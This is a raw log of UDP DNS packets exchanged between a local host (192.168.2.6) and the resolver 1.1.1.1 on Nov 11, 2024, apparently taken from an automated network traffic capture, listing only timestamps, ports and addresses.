                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.241262913 CET5181353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.241573095 CET6107553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.242046118 CET6187053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.242275000 CET5396153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.242428064 CET53649521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.244188070 CET5993153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.244204044 CET53561271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.244338989 CET53526951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.245587111 CET5728453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.251590014 CET53618701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.251837969 CET53518131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.252804041 CET53539611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.254383087 CET53599311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.256141901 CET53572841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.264070034 CET53559981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.268712997 CET53572401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.271682978 CET5491153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272352934 CET5880153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272538900 CET5554853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272562981 CET53610751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272835016 CET5644253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275162935 CET5952053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275434017 CET5481953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275670052 CET5299253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275834084 CET4987353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.276570082 CET4962553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.281021118 CET53549111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.282560110 CET53588011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.283103943 CET53529921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.283468008 CET53564421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.284435034 CET53595201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.284689903 CET5469753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.285058975 CET53548191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.285921097 CET53498731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.287699938 CET5086553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.288305044 CET6492053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.288466930 CET6487053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.289159060 CET5547653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.289463997 CET5762053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.289963007 CET5440253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290174007 CET4940953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290402889 CET6059353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290796041 CET6014153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290833950 CET5380853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291461945 CET5188753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291909933 CET5877753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291954994 CET5010053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.292448044 CET4996553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.297725916 CET53494091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.298032999 CET53648701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.298176050 CET53649201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.299129009 CET53576201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.299568892 CET53554761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.300213099 CET53601411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.300956964 CET53518871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.301598072 CET53538081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.302164078 CET53499651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.303472996 CET53555481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.304610014 CET5078653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.305512905 CET6124453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.307915926 CET53496251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174280882 CET5263053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174395084 CET5796653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174810886 CET5488053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176392078 CET4945453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176708937 CET53554231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176793098 CET4940253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.177299023 CET5673653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.177527905 CET53551221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.179068089 CET53602281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.180121899 CET53590611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.181627989 CET5978053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.181766987 CET53608531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.182116985 CET53603601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.183902979 CET53649351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.184274912 CET53526301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.184457064 CET53494021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.187762022 CET53567361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.188621044 CET53611871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.190769911 CET53597801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.207067966 CET53579661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.207165003 CET53548801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.207477093 CET53494541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225616932 CET5611753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225888968 CET4982653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226002932 CET6146353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226181030 CET5964553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226881981 CET5458753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227183104 CET5541353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227344990 CET5140053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228296995 CET5174453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228327036 CET5472353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228461027 CET5728453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228517056 CET6394253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228696108 CET4979853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228718996 CET6150453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228851080 CET6418053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236073017 CET53596451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236092091 CET53614631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236262083 CET53554131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.236634016 CET53561171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237473965 CET53545871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237483978 CET53497981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237494946 CET53514001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.237966061 CET53517441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238720894 CET53547231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238743067 CET53639421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238759995 CET53572841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.238769054 CET53641801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.244389057 CET53498261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.246002913 CET53615041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260668039 CET5944453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260921001 CET4966353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261267900 CET6100053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261545897 CET5309653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262326002 CET5309253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262451887 CET5019353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262777090 CET5531253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263106108 CET6548353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263403893 CET6263453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263465881 CET6175153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.270754099 CET53496631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.271177053 CET53530961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.271583080 CET53610001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.272783041 CET53530921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.273546934 CET53501931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.273751020 CET53617511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.275099039 CET53654831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.292498112 CET53594441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.294217110 CET53553121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.294856071 CET6513553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295133114 CET5180753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295356035 CET53626341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295659065 CET5811453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296216965 CET5208153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296726942 CET6167553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297211885 CET5338653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297929049 CET5814153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.304152012 CET53518071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.305057049 CET53581141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.306700945 CET53533861.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.307013988 CET53581411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312156916 CET5282353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312351942 CET5368353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312582016 CET5436053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.322290897 CET53543601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.327107906 CET53651351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.327133894 CET53520811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.327671051 CET53616751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.330475092 CET53528231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.342123985 CET53536831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.403160095 CET5465153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.403238058 CET6162753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.413613081 CET53546511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.413924932 CET53616271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.151535988 CET5856253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.152921915 CET4954353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158427954 CET5849253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.162116051 CET53585621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.166302919 CET5128753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.166543961 CET6447153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.168385983 CET53495431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.170962095 CET53584921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.172735929 CET6416153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798705101 CET53516941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798749924 CET6484253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.798891068 CET53556161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.799475908 CET5318553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.800148010 CET5329453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801450014 CET5111853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801615000 CET53605801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.801682949 CET53544301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.802614927 CET53510621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.803637981 CET53589561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.803755999 CET53581031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.805521011 CET53651501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.805917978 CET53618051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.806010008 CET53623411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807096958 CET53550391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807652950 CET53584011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807698011 CET53501531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.807971001 CET53639541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.808358908 CET53549771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.809338093 CET53648421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.809385061 CET53537611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.809393883 CET53598921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.811021090 CET53511181.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814568043 CET5778553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814568043 CET5773353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.814935923 CET5376653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.815021038 CET6041253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.819856882 CET5276153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.820707083 CET53571041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.820996046 CET5656753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.822714090 CET53586871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.823431015 CET53494361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.823586941 CET53641171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.826874971 CET53595401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.826998949 CET53625371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827112913 CET53559001.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827348948 CET5293053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.827497005 CET53509951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.828265905 CET53506261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.829878092 CET53527611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.830642939 CET53531851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.831371069 CET5458753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.832699060 CET53577331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.832849026 CET53532941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.836689949 CET53529301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.838969946 CET4979653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.839622974 CET53565671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.846030951 CET53604121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.846342087 CET53577851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.846357107 CET53537661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.862638950 CET53545871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.864741087 CET6213053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.864975929 CET5617353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.869326115 CET6496553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.869326115 CET6072153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.870069027 CET53497961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.872634888 CET53561731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.874560118 CET53621301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876512051 CET6380953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876513004 CET5274153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876725912 CET6012753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876727104 CET4930653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET6393053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.876889944 CET5410853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877022028 CET6351553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET5536953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877088070 CET6031353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877976894 CET6136153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.877978086 CET5852453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.878283978 CET53649651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.878339052 CET6324853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.880273104 CET5835253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.881311893 CET5498753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.884294033 CET53638091.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886439085 CET53635151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886609077 CET53603131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886635065 CET53553691.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.886750937 CET53541081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.887742996 CET53613611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.888190985 CET53585241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.888689995 CET53632481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.891330957 CET53549871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.900541067 CET53607211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.907130957 CET53527411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.907183886 CET53639301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.907933950 CET53493061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.908379078 CET53601271.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.913486004 CET53583521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.916754961 CET5027353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET6146153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917346001 CET5194953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET5642953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.917803049 CET5036853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.927063942 CET53519491.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.928195953 CET53614611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.949049950 CET53564291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.949563980 CET53503681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.950197935 CET53502731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.961081028 CET5455253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:59.971426964 CET53545521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.071304083 CET5490053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084450006 CET6203853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:01.084577084 CET6398053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.095326900 CET5718753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.101248980 CET6342653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.105340958 CET53571871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.111866951 CET53634261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.112459898 CET5032953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.114927053 CET6343653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.122937918 CET53503291.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.131351948 CET6390853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.136408091 CET5622753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.137840986 CET5301753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.139540911 CET53639081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.140834093 CET6086853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.143655062 CET5582253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.146635056 CET5383753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.147274017 CET5395053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.149153948 CET6042353192.168.2.61.1.1.1
